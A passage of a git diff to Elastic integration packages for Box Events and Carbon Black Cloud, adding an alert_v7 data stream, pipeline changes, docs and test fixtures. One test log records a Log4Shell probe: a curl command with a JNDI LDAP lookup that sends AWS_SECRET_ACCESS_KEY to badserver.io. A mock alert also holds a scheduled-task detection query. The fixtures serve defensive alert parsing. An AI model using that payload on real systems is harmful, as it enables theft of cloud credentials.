ignore_missing: true - date: field: box.recorded_at target_field: "@timestamp" @@ -1181,6 +1187,23 @@ processors: field: "_ingest._value.indicator.as.organization_name" target_field: "_ingest._value.indicator.as.organization.name" ignore_missing: true +# Move geo.ip out of geo and check for IP validity. + - foreach: + field: threat.enrichments + ignore_missing: true + processor: + convert: + field: "_ingest._value.indicator.geo.ip" + target_field: "_ingest._value.indicator.ip" + type: ip + ignore_failure: true + - foreach: + field: threat.enrichments + ignore_missing: true + processor: + remove: + field: "_ingest._value.indicator.geo.ip" + ignore_missing: true # AS lookup for stand-alone indicator - geoip: database_file: GeoLite2-ASN.mmdb @@ -1222,6 +1245,9 @@ processors: return false; } dropEmptyFields(ctx); + - remove: + field: _conf + ignore_missing: true on_failure: - set: field: event.kind diff --git a/packages/box_events/data_stream/events/fields/ecs.yml b/packages/box_events/data_stream/events/fields/ecs.yml index 8ed61a7c0a4..f0aaa28f258 100644 --- a/packages/box_events/data_stream/events/fields/ecs.yml +++ b/packages/box_events/data_stream/events/fields/ecs.yml @@ -72,6 +72,10 @@ name: threat.indicator.description - external: ecs name: threat.enrichments +- external: ecs + name: threat.enrichments.indicator.as.number +- external: ecs + name: threat.enrichments.indicator.as.organization.name - external: ecs name: threat.enrichments.indicator.description - external: ecs @@ -94,6 +98,8 @@ name: threat.enrichments.indicator.ip - external: ecs name: threat.enrichments.indicator.last_seen +- external: ecs + name: threat.enrichments.indicator.provider - external: ecs name: threat.enrichments.indicator.reference - external: ecs diff --git a/packages/box_events/data_stream/events/fields/fields.yml b/packages/box_events/data_stream/events/fields/fields.yml index 63c22514c5c..c7ab48b266b 100644 --- a/packages/box_events/data_stream/events/fields/fields.yml +++ b/packages/box_events/data_stream/events/fields/fields.yml @@ -373,6 +373,12 @@ - name: entries type: group fields: + - name: etag + description: The HTTP etag of this folder + type: keyword + - name: sequence_id + description: A numeric identifier that represents the most recent user event that has been applied to this item + type: keyword - name: type description: Value is always `folder`. This field is an array type: keyword diff --git a/packages/box_events/docs/README.md b/packages/box_events/docs/README.md index e512db11d6b..320dcfb9268 100644 --- a/packages/box_events/docs/README.md +++ b/packages/box_events/docs/README.md @@ -236,8 +236,10 @@ Preserves a raw copy of the original event, added to the field `event.original`. | box.source.parent.name | The name of the folder | keyword | | box.source.parent.sequence_id | A numeric identifier that represents the most recent user event that has been applied to this item (parent) | keyword | | box.source.parent.type | Value is always `folder` | keyword | +| box.source.path_collection.entries.etag | The HTTP etag of this folder | keyword | | box.source.path_collection.entries.id | The unique identifier that represent a folder. This field is an array | keyword | | box.source.path_collection.entries.name | The name of the parent folder. This field is an array | keyword | +| box.source.path_collection.entries.sequence_id | A numeric identifier that represents the most recent user event that has been applied to this item | keyword | | box.source.path_collection.entries.type | Value is always `folder`. This field is an array | keyword | | box.source.path_collection.total_count | The number of folders in this list | long | | box.source.phone | Phone number | boolean | @@ -330,6 +332,9 @@ Preserves a raw copy of the original event, added to the field `event.original`. | rule.uuid | A rule ID that is unique within the scope of a set or group of agents, observers, or other entities using the rule for detection of this event. | keyword | | tags | List of keywords used to tag each event. | keyword | | threat.enrichments | A list of associated indicators objects enriching the event, and the context of that association/enrichment. | nested | +| threat.enrichments.indicator.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | +| threat.enrichments.indicator.as.organization.name | Organization name. | keyword | +| threat.enrichments.indicator.as.organization.name.text | Multi-field of `threat.enrichments.indicator.as.organization.name`. | match_only_text | | threat.enrichments.indicator.description | Describes the type of action conducted by the threat. | keyword | | threat.enrichments.indicator.first_seen | The date and time when intelligence source first reported sighting this indicator. | date | | threat.enrichments.indicator.geo.city_name | City name. | keyword | @@ -341,6 +346,7 @@ Preserves a raw copy of the original event, added to the field `event.original`. | threat.enrichments.indicator.geo.region_name | Region name. | keyword | | threat.enrichments.indicator.ip | Identifies a threat indicator as an IP address (irrespective of direction). | ip | | threat.enrichments.indicator.last_seen | The date and time when intelligence source last reported sighting this indicator. | date | +| threat.enrichments.indicator.provider | The name of the indicator's provider. | keyword | | threat.enrichments.indicator.reference | Reference URL linking to additional information about this indicator. | keyword | | threat.enrichments.indicator.type | Type of indicator as represented by Cyber Observable in STIX 2.0. | keyword | | threat.indicator.as.number | Unique number allocated to the autonomous system. The autonomous system number (ASN) uniquely identifies each network on the Internet. | long | diff --git a/packages/box_events/manifest.yml b/packages/box_events/manifest.yml index fbef79d39d6..f6f41d49534 100644 --- a/packages/box_events/manifest.yml +++ b/packages/box_events/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: box_events title: Box Events -version: "2.5.1" +version: "2.8.0" description: "Collect logs from Box with Elastic Agent" type: integration categories: @@ -9,7 +9,7 @@ categories: - productivity_security conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" screenshots: - src: /img/box_screenshot.png title: "[Logs Box Events Integration] Events Dashboard" @@ -109,6 +109,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: enable_request_tracer type: bool title: Enable request tracing @@ -124,6 +125,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: api_url type: text title: API URL @@ -140,6 +142,7 @@ policy_templates: multi: false required: true show_user: true + secret: true - name: box_subject_type type: text title: Box Subject Type diff --git a/packages/carbon_black_cloud/_dev/build/docs/README.md b/packages/carbon_black_cloud/_dev/build/docs/README.md index 0b965795fac..a1a7c4b60b5 100644 --- a/packages/carbon_black_cloud/_dev/build/docs/README.md +++ b/packages/carbon_black_cloud/_dev/build/docs/README.md @@ -2,9 +2,29 @@ The VMware Carbon Black Cloud integration collects and parses data from the Carbon Black Cloud REST APIs and AWS S3 bucket. -## Compatibility +## Version 2.0.0+ Update Disclaimer +Carbon Black Cloud `Alerts API (v6)` [will be deactivated on July 31, 2024](https://developer.carbonblack.com/reference/carbon-black-cloud/api-migration/#migration-summary). After this, the current alert data stream will become unusable. To enable a smooth transition we have introduced a new data stream named `alert_v7` based on the major `Alerts API (v7)` schema changes and `Data Forwarder 2.0` schema changes. This data stream has significant changes compared to the original data stream and is only available for our new `CEL input` which is currently tagged as `[Beta]`. Please consult the official docs [Alerts v7](https://developer.carbonblack.com/reference/carbon-black-cloud/guides/api-migration/alerts-migration) and [Data Forwarder 2.0](https://developer.carbonblack.com/reference/carbon-black-cloud/data-forwarder/schema/latest/alert-2.0.0/) for further info. After July 31, 2024, the old alerts v6 data stream will be deprecated and removed from the HTTPJSON input and only the new `alert_v7` data stream will exist under the `CEL input`. + +## Version 1.21+ Update Disclaimer +Starting from version 1.21, if using multiple AWS data streams simultaneously configured to use AWS SQS, separate SQS queues should be configured per +data stream. The default values of file selector regexes have been commented out for this reason. The only reason the global queue now exists is to avoid +a breaking change while upgrading to version 1.21 and above. A separate SQS queue per data stream should help fix the data loss that's been occurring in the +older versions. + +## HTTPJSON vs CEL +Version 2.0.0 introduces the use of the CEL input. This input method is currently marked as [Beta] while the older HTTPJSON input method has been +marked as [Legacy]. The HTTPJSON input method will not receive enhancement changes and will not support the new `alert_v7` data stream. + +## Note (Important) +1. Do not enable both the HTTPJSON and CEL input methods within a single data stream; having both enabled simultaneously can cause unexpected/duplicated results, as they operate on the same data streams. -This module has been tested against `Alerts API (v6)`, `Audit Log Events (v3)` and `Vulnerability Assessment (v1)`. +2. When using the AWS-S3 input, use either the old alert data stream or the new [Beta] alert_v7 data stream that supports the Data Forwarder 2.0 schema. + +3. The `alert_v7` data stream is supported by our new `Alert V7` dashboards. The old `Alert` dashboards will not reflect the new changes. + + +## Compatibility +This module has been tested against `Alerts API (v7) [Beta]`, `Alerts API (v6)`, `Audit Log Events (v3)` and `Vulnerability Assessment (v1)`. ## Requirements @@ -15,27 +35,30 @@ This module has been tested against `Alerts API (v6)`, `Audit Log Events (v3)` a | Data Stream Name | Bucket List Prefix | | ----------------- | ---------------------- | + | Alert_v7 | alert_logs_v7 | | Alert | alert_logs | | Endpoint Event | endpoint_event_logs | | Watchlist Hit | watchlist_hit_logs | ### To collect data from AWS SQS, follow the below steps: 1. If data forwarding to an AWS S3 Bucket hasn't been configured, then first setup an AWS S3 Bucket as mentioned in the above documentation. -2. To setup an SQS queue, follow "Step 1: Create an Amazon SQS queue" mentioned in the [Documentation](https://docs.aws.amazon.com/AmazonS3/latest/userguide/ways-to-add-notification-config-to-bucket.html). +2. To set up an SQS queue, follow "Step 1: Create an Amazon SQS queue" mentioned in the [Documentation](https://docs.aws.amazon.com/AmazonS3/latest/userguide/ways-to-add-notification-config-to-bucket.html). - While creating an SQS Queue, please provide the same bucket ARN that has been generated after creating an AWS S3 Bucket. -3. Setup event notification for an S3 bucket. Follow this [Link](https://docs.aws.amazon.com/AmazonS3/latest/userguide/enable-event-notifications.html). - - The user has to perform Step 3 for all the data-streams individually, and each time prefix parameter should be set the same as the S3 Bucket List Prefix as created earlier. (for example, `alert_logs/` for alert data stream.) +3. Set up event notification for an S3 bucket. Follow this [Link](https://docs.aws.amazon.com/AmazonS3/latest/userguide/enable-event-notifications.html). + - The user has to perform Step 3 for all the data streams individually, and each time prefix parameter should be set the same as the S3 Bucket List Prefix as created earlier. (for example, `alert_logs/` for the alert data stream.) - For all the event notifications that have been created, select the event type as s3:ObjectCreated:*, select the destination type SQS Queue, and select the queue that has been created in Step 2. **Note**: - Credentials for the above AWS S3 and SQS input types should be configured using the [link](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-aws-s3.html#aws-credentials-config). - Data collection via AWS S3 Bucket and AWS SQS are mutually exclusive in this case. + - When configuring SQS queues, separate queues should be used for each data stream instead of the global SQS queue from version 1.21 onwards to avoid data + loss. File selectors should not be used to filter out data stream logs using the global queue as it was in versions prior. ### In order to ingest data from the APIs you must generate API keys and API Secret Keys: 1. In Carbon Black Cloud, On the left navigation pane, click **Settings > API Access**. 2. Click Add API Key. 3. Give the API key a unique name and description. - - Select the appropriate access level type. Please check required Access Levels & Permissions for integration in below table. + - Select the appropriate access level type. Please check the required Access Levels & Permissions for integration in the table below. **Note:** To use a custom access level, select Custom from the Access Level type drop-down menu and specify the Custom Access Level. - Optional: Add authorized IP addresses. - You can restrict the use of an API key to a specific set of IP addresses for security reasons. @@ -74,6 +97,14 @@ This is the `alert` dataset. {{fields "alert"}} +### Alert + +This is the `alert_v7` dataset. + +{{event "alert_v7"}} + +{{fields "alert_v7"}} + ### Endpoint Event This is the `endpoint_event` dataset. diff --git a/packages/carbon_black_cloud/_dev/deploy/docker/files/config.yml b/packages/carbon_black_cloud/_dev/deploy/docker/files/config.yml index 96111623de2..18b84518747 100644 --- a/packages/carbon_black_cloud/_dev/deploy/docker/files/config.yml +++ b/packages/carbon_black_cloud/_dev/deploy/docker/files/config.yml @@ -5,6 +5,12 @@ rules: - status_code: 200 body: | {"results":[{"type":"DEVICE_CONTROL","id":"test1","legacy_alert_id":"C8EB7306-AF26-4A9A-B677-814B3AF69720","org_key":"ABCD6X3T","create_time":"2020-11-17T22:05:13Z","last_update_time":"2020-11-17T22:05:13Z","first_event_time":"2020-11-17T22:02:16Z","last_event_time":"2020-11-17T22:02:16Z","threat_id":"t5678","severity":3,"category":"WARNING","device_id":2,"device_os":"WINDOWS","device_os_version":"Windows 10 x64","device_name":"DESKTOP-002","device_username":"test34@demo.com","policy_id":6997287,"policy_name":"Standard","target_value":"MEDIUM","workflow":{"state":"OPEN","remediation":"","last_update_time":"2020-11-17T22:02:16Z","comment":"","changed_by":"Carbon Black"},"reason":"Access attempted on unapproved USB device SanDisk U3 Cruzer Micro (SN: 0875920EF7C2A304). A Deny Policy Action was applied.","reason_code":"6D578342-9DE5-4353-9C25-1D3D857BFC5B:DCAEB1FA-513C-4026-9AB6-37A935873FBC","device_location":"UNKNOWN","threat_cause_threat_category":"NON_MALWARE","threat_cause_vector":"REMOVABLE_MEDIA","threat_cause_cause_event_id":"FCEE2AF0-D832-4C9F-B988-F11B46028C9E","sensor_action":"DENY","run_state":"DID_NOT_RUN","policy_applied":"APPLIED","vendor_name":"SanDisk","vendor_id":"0x0781","product_name":"U3 Cruzer Micro","product_id":"0x5406","serial_number":"0875920EF7C2A304"}],"num_found":6197,"num_available":6197} + - path: /api/alerts/v7/orgs/xxxx/alerts/_search + methods: ["POST"] + responses: + - status_code: 200 + body: | + {"results":[{"org_key":"7DESJ9GN","alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:1c6aba68-24cc-41e3-ad8e-4b545a587b55&orgKey=7DESJ9GN","id":"1c6aba68-24cc-41e3-ad8e-4b545a587b55","type":"WATCHLIST","backend_timestamp":"2024-03-13T08:03:29.540Z","user_update_timestamp":null,"backend_update_timestamp":"2024-03-13T08:03:29.540Z","detection_timestamp":"2024-03-13T08:02:36.578Z","first_event_timestamp":"2024-03-13T08:00:09.894Z","last_event_timestamp":"2024-03-13T08:00:09.894Z","severity":5,"reason":"Process powershell.exe was detected by the report \"Execution - AMSI - New Fileless Scheduled Task Behavior Detected\" in watchlist \"AMSI Threat Intelligence\"","reason_code":"c21ca826-573a-3d97-8c1e-93c8471aab7f:8033b29d-81d2-3c47-82d2-f4a7f398b85d","threat_id":"C21CA826573A8D974C1E93C8471AAB7F","primary_event_id":"re9M9hp8TbGLqyk6QXqQqA-0","policy_applied":"NOT_APPLIED","run_state":"RAN","sensor_action":"ALLOW","workflow":{"change_timestamp":"2024-03-13T08:03:29.540Z","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION","closure_reason":"NO_REASON","status":"OPEN"},"determination":{"change_timestamp":"2024-03-13T08:03:29.540Z","value":"NONE","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION"},"tags":null,"alert_notes_present":false,"threat_notes_present":false,"is_updated":false,"device_id":6612391,"device_name":"EIP\\WW-20002","device_uem_id":"","device_target_value":"MEDIUM","device_policy":"default","device_policy_id":6525,"device_os":"WINDOWS","device_os_version":"Windows 10 x64","device_username":"EIP\\Administrator","device_location":"UNKNOWN","device_external_ip":"75.98.230.194","device_internal_ip":"172.16.100.140","asset_group":[],"mdr_alert":false,"mdr_alert_notes_present":false,"mdr_threat_notes_present":false,"report_id":"LrKOC7DtQbm4g8w0UFruQg-d1080521-e617-4e45-94e0-7a145c62c90a","report_name":"Execution - AMSI - New Fileless Scheduled Task Behavior Detected","report_description":"Newer Powershell versions introduced built-in cmdlets to manage scheduled tasks natively without calling out to typical scheduled task processes like at.exe or schtasks.exe. This detection looks for behaviors related to the fileless execution of scheduled tasks. If you are responding to this alert, be sure to correlate the fileless scriptload events with events typically found in your environment Generally, attackers will create scheduled tasks with binaries that are located in user writable directories like AppData, Temp, or public folders.","report_tags":["execution","privesc","persistence","t1053","windows","amsi","attack","attackframework"],"report_link":"https://attack.mitre.org/techniques/T1053/","ioc_id":"d1080521-e617-4e45-94e0-7a145c62c90a","ioc_hit":"(fileless_scriptload_cmdline:Register-ScheduledTask OR fileless_scriptload_cmdline:New-ScheduledTask OR scriptload_content:Register-ScheduledTask OR scriptload_content:New-ScheduledTask) AND NOT (process_cmdline:windows\\\\ccm\\\\systemtemp OR crossproc_name:windows\\\\ccm\\\\ccmexec.exe OR (process_publisher:\"VMware, Inc.\" AND process_publisher_state:FILE_SIGNATURE_STATE_TRUSTED))","watchlists":[{"id":"Ci7w5B4URg6HN60hatQMQ","name":"AMSI Threat Intelligence"}],"process_guid":"7DESJ9GN-0064e5a7-00001434-00000000-1da751c7354ebfe","process_pid":5172,"process_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe","process_sha256":"9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3","process_md5":"2e5a8590cf6848968fc23de3fa1e25f1","process_effective_reputation":"TRUSTED_WHITE_LIST","process_reputation":"TRUSTED_WHITE_LIST","process_cmdline":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -EP Bypass \\\\eip.demo\\sysvol\\EIP.DEMO\\scripts\\Luminol.ps1","process_username":"NT AUTHORITY\\SYSTEM","process_issuer":["Microsoft Windows Production PCA 2011"],"process_publisher":["Microsoft Windows"],"parent_guid":"7DESJ9GN-0064e5a7-0000077c-00000000-1da5ed7ec07b275","parent_pid":1916,"parent_name":"c:\\windows\\system32\\svchost.exe","parent_sha256":"f13de58416730d210dab465b242e9c949fb0a0245eef45b07c381f0c6c8a43c3","parent_md5":"145dcf6706eeea5b066885ee17964c09","parent_effective_reputation":"TRUSTED_WHITE_LIST","parent_reputation":"TRUSTED_WHITE_LIST","parent_cmdline":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule","parent_username":"NT AUTHORITY\\SYSTEM","childproc_guid":"","childproc_username":"","childproc_cmdline":"","ml_classification_final_verdict":"NOT_ANOMALOUS","ml_classification_global_prevalence":"LOW","ml_classification_org_prevalence":"LOW","ml_classification_anomalies":[]}],"num_found":1,"num_available":1} - path: /integrationServices/v3/auditlogs methods: ["GET"] responses: diff --git a/packages/carbon_black_cloud/changelog.yml b/packages/carbon_black_cloud/changelog.yml index 7f2e98d0eb6..028a2ddfd82 100644 --- a/packages/carbon_black_cloud/changelog.yml +++ b/packages/carbon_black_cloud/changelog.yml @@ -1,4 +1,37 @@ # newer versions go on top +- version: "2.0.0" + changes: + - description: Added v7 alert data stream with dashboards along with new CEL input type for all http data streams. + type: enhancement + link: https://github.com/elastic/integrations/pull/9467 +- version: "1.21.3" + changes: + - description: Added support for more device_timestamp formats. + type: bugfix + link: https://github.com/elastic/integrations/pull/9391 +- version: "1.21.2" + changes: + - description: Fixed handling of @timestamp in endpoint event data stream. + type: bugfix + link: https://github.com/elastic/integrations/pull/9380 +- version: "1.21.1" + changes: + - description: Fix handling of network direction. + type: bugfix + link: https://github.com/elastic/integrations/pull/9340 +- version: "1.21.0" + changes: + - description: Introduced data stream specific SQS queues. + type: enhancement + link: https://github.com/elastic/integrations/pull/9303 + - description: Fixed data loss issue by providing option for local SQS queues. + type: bugfix + link: https://github.com/elastic/integrations/pull/9303 +- version: "1.20.0" + changes: + - description: Set sensitive values as secret and add missing mappings. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.19.1" changes: - description: Changed owners diff --git a/packages/carbon_black_cloud/data_stream/alert/agent/stream/aws-s3.yml.hbs b/packages/carbon_black_cloud/data_stream/alert/agent/stream/aws-s3.yml.hbs index 26c4d05045f..017d6e7fe37 100644 --- a/packages/carbon_black_cloud/data_stream/alert/agent/stream/aws-s3.yml.hbs +++ b/packages/carbon_black_cloud/data_stream/alert/agent/stream/aws-s3.yml.hbs @@ -15,7 +15,9 @@ bucket_list_prefix: {{bucket_list_prefix}} {{else}} -{{#if queue_url}} +{{#if queue_url_alert}} +queue_url: {{queue_url_alert}} +{{else if queue_url}} queue_url: {{queue_url}} {{/if}} {{#if visibility_timeout}} diff --git a/packages/carbon_black_cloud/data_stream/alert/agent/stream/httpjson.yml.hbs b/packages/carbon_black_cloud/data_stream/alert/agent/stream/httpjson.yml.hbs index 0371e9b2f03..235d7824cec 100644 --- a/packages/carbon_black_cloud/data_stream/alert/agent/stream/httpjson.yml.hbs +++ b/packages/carbon_black_cloud/data_stream/alert/agent/stream/httpjson.yml.hbs @@ -1,6 +1,8 @@ config_version: 2 interval: {{interval}} -request.timeout: 2m +{{#if http_client_timeout}} +request.timeout: {{http_client_timeout}} +{{/if}} request.method: POST {{#if enable_request_tracer}} request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson" diff --git a/packages/carbon_black_cloud/data_stream/alert/elasticsearch/ingest_pipeline/default.yml b/packages/carbon_black_cloud/data_stream/alert/elasticsearch/ingest_pipeline/default.yml index 228a44bebba..64f57bf0667 100644 --- a/packages/carbon_black_cloud/data_stream/alert/elasticsearch/ingest_pipeline/default.yml +++ b/packages/carbon_black_cloud/data_stream/alert/elasticsearch/ingest_pipeline/default.yml @@ -30,7 +30,7 @@ processors: field: json.create_time - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - date: field: json.last_update_time target_field: carbon_black_cloud.alert.last_update_time @@ -42,7 +42,7 @@ processors: field: json.last_update_time - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - set: field: event.kind value: alert @@ -61,7 +61,7 @@ processors: field: json.first_event_time - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - date: field: json.last_event_time target_field: event.end @@ -73,7 +73,7 @@ processors: field: json.last_event_time - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: field: json.severity target_field: event.severity @@ -84,7 +84,7 @@ processors: field: json.severity - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.reason target_field: event.reason @@ -275,7 +275,7 @@ processors: field: json.count - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - convert: field: json.notes_present target_field: carbon_black_cloud.alert.notes_present @@ -286,7 +286,7 @@ processors: field: json.notes_present - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - rename: field: json.ioc_id target_field: carbon_black_cloud.alert.ioc.id @@ -326,7 +326,7 @@ processors: field: carbon_black_cloud.alert.workflow.last_update_time - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' - remove: field: event.original if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event')) @@ -380,4 +380,4 @@ on_failure: value: pipeline_error - append: field: error.message - value: '{{{_ingest.on_failure_message}}}' + value: 'Processor {{{_ingest.on_failure_processor_type}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' diff --git a/packages/carbon_black_cloud/data_stream/alert/manifest.yml b/packages/carbon_black_cloud/data_stream/alert/manifest.yml index d5d4c58ad08..7521479232a 100644 --- a/packages/carbon_black_cloud/data_stream/alert/manifest.yml +++ b/packages/carbon_black_cloud/data_stream/alert/manifest.yml @@ -22,6 +22,14 @@ streams: multi: false required: true show_user: true + - name: http_client_timeout + type: text + title: HTTP Client Timeout + description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h. + multi: false + required: false + show_user: true + default: 2m - name: tags type: text title: Tags @@ -52,6 +60,15 @@ streams: description: Collect alerts from Carbon Black Cloud. template_path: aws-s3.yml.hbs vars: + - name: queue_url_alert + type: text + title: "[Alert][SQS] Queue URL" + multi: false + required: false + show_user: true + description: |- + URL of the AWS SQS queue that messages will be received from. This is only required if you want to collect logs via AWS SQS. + This is an alert data stream specific queue URL. This will override the global queue URL if provided. - name: bucket_list_prefix type: text title: "[S3] Bucket Prefix" @@ -106,8 +123,8 @@ streams: required: false show_user: false default: | - - regex: "alert_logs/" - description: If the SQS queue will have events that correspond to files that this integration shouldn’t process, file_selectors can be used to limit the files that are downloaded. This is a list of selectors which are made up of regex and expand_event_list_from_field options. The regex should match the S3 object key in the SQS message, and the optional expand_event_list_from_field is the same as the global setting. If file_selectors is given, then any global expand_event_list_from_field value is ignored in favor of the ones specified in the file_selectors. Regexes use [RE2 syntax](https://pkg.go.dev/regexp/syntax). Files that don’t match one of the regexes will not be processed. + # - regex: "alert_logs/" + description: "If the SQS queue will have events that correspond to files that this integration shouldn’t process, file_selectors can be used to limit the files that are downloaded. \nThis is a list of selectors which are made up of regex and expand_event_list_from_field options. The regex should match the S3 object key in the SQS message, and the optional expand_event_list_from_field is the same as the global setting. \nIf file_selectors is given, then any global expand_event_list_from_field value is ignored in favor of the ones specified in the file_selectors. \nRegexes use [RE2 syntax](https://pkg.go.dev/regexp/syntax). Files that don’t match one of the regexes will not be processed.\n[NOTE]: It is recommended to use data stream specific SQS queues instead of file_selectors to avoid data loss." - name: tags type: text title: Tags diff --git a/packages/carbon_black_cloud/data_stream/alert/sample_event.json b/packages/carbon_black_cloud/data_stream/alert/sample_event.json index 3f1c2b77f5f..5e563c6284e 100644 --- a/packages/carbon_black_cloud/data_stream/alert/sample_event.json +++ b/packages/carbon_black_cloud/data_stream/alert/sample_event.json @@ -99,4 +99,4 @@ "user": { "name": "test34@demo.com" } -} +} \ No newline at end of file diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-base-alert.log b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-base-alert.log new file mode 100644 index 00000000000..01bb258cc09 --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-base-alert.log @@ -0,0 +1 @@ +{"version":"2.0.0","org_key":"ABCD1234","alert_url":"https://defense-dev01.cbdtest.io/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Aca316d99-a808-3779-8aab-62b2b6d9541c","id":"ca316d99-a808-3779-8aab-62b2b6d9541c","type":"INTRUSION_DETECTION_SYSTEM","is_updated":false,"detection_timestamp":"2023-02-03T17:22:03.945Z","first_event_timestamp":"2023-02-03T17:22:03.945Z","last_event_timestamp":"2023-02-03T17:22:03.945Z","severity":1,"reason":"HTTP traffic from asset DEV01-39X-1 matched IDS signature for threat CVE-2021-44228 Exploit. curl.exe made a HTTP/80 connection to 81.2.69.142 from 10.203.105.21","threat_id":"bbe232a02b6c5583786503c25fe9a1d29d6ed39d3a295a6ff5c07f81629d0017","primary_event_id":"21AB6B27-9F72-11ED-A79A-005056A53F17","workflow":{"status":"OPEN","change_timestamp":"2023-02-03T17:27:33.007Z","changed_by_type":"SYSTEM","changed_by":"ALERT_CREATION","closure_reason":"NO_REASON"},"alert_notes_present":false,"policy_applied":"NOT_APPLIED","run_state":"RAN","rule_category_id":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D","rule_id":"B5974D4D-265E-4FAF-8F71-2F76AAD67857","reason_code":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D:B5974D4D-265E-4FAF-8F71-2F76AAD67857","sensor_action":"ALLOW","device_target_value":"MEDIUM","device_policy_id":165700,"device_policy":"Standard","device_id":17482451,"device_name":"DEV01-39X-1","device_os":"WINDOWS","device_os_version":"Windows 10 x64","device_username":"DemoMachine","device_location":"UNKNOWN","device_external_ip":"66.170.99.2","device_internal_ip":"10.203.105.21","netconn_remote_port":80,"netconn_local_port":49233,"netconn_remote_domain":"google.com","netconn_remote_ip":"81.2.69.142","netconn_local_ip":"10.203.105.21","netconn_remote_ipv4":"81.2.69.142","netconn_local_ipv4":"10.203.105.21","attack_tactic":"TA0001","attack_technique":"T1190","tms_rule_id":"4b98443a-ba0d-4ff5-b99e-e5e70432a214","threat_name":"CVE-2021-44228 Exploit","process_guid":"ABCD1234-010ac2d3-00001694-00000000-1d937f40884b9e0","process_pid":5780,"process_name":"c:\\windows\\system32\\curl.exe","process_sha256":"d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4","process_md5":"eac53ddafb5cc9e780a7cc086ce7b2b1","process_reputation":"TRUSTED_WHITE_LIST","process_effective_reputation":"TRUSTED_WHITE_LIST","process_cmdline":"curl -H \"Host: \\${jndi:ldap://\\{env:AWS_SECRET_ACCESS_KEY}.badserver.io}\" http://google.com/testingids","process_username":"DEV01-39X-1\\bit9qa","process_issuer":["Microsoft Windows Production PCA 2011"],"process_publisher":["Microsoft Windows"],"parent_guid":"ABCD1234-010ac2d3-0000225c-00000000-1d9300e2bb5211a","parent_pid":8796,"parent_name":"c:\\windows\\system32\\cmd.exe","parent_sha256":"b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450","parent_md5":"8a2122e8162dbef04694b9c3e0b6cdee","parent_reputation":"TRUSTED_WHITE_LIST","parent_effective_reputation":"TRUSTED_WHITE_LIST","parent_cmdline":"\"C:\\WINDOWS\\system32\\cmd.exe\" ","parent_username":"DEV01-39X-1\\bit9qa","mdr_alert_notes_present":false,"mdr_alert":false} diff --git a/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-base-alert.log-expected.json b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-base-alert.log-expected.json new file mode 100644 index 00000000000..e676511f4ee --- /dev/null +++ b/packages/carbon_black_cloud/data_stream/alert_v7/_dev/test/pipeline/test-alert-base-alert.log-expected.json @@ -0,0 +1,154 @@ +{ + "expected": [ + { + "@timestamp": "2023-02-03T17:22:03.945Z", + "carbon_black_cloud": { + "alert": { + "alert_notes_present": false, + "attack_tactic": "TA0001", + "attack_technique": "T1190", + "category": "THREAT", + "device": { + "external_ip": "66.170.99.2", + "internal_ip": "10.203.105.21", + "location": "UNKNOWN", + "os": "WINDOWS", + "policy": "Standard", + "policy_id": 165700, + "target_value": "MEDIUM" + }, + 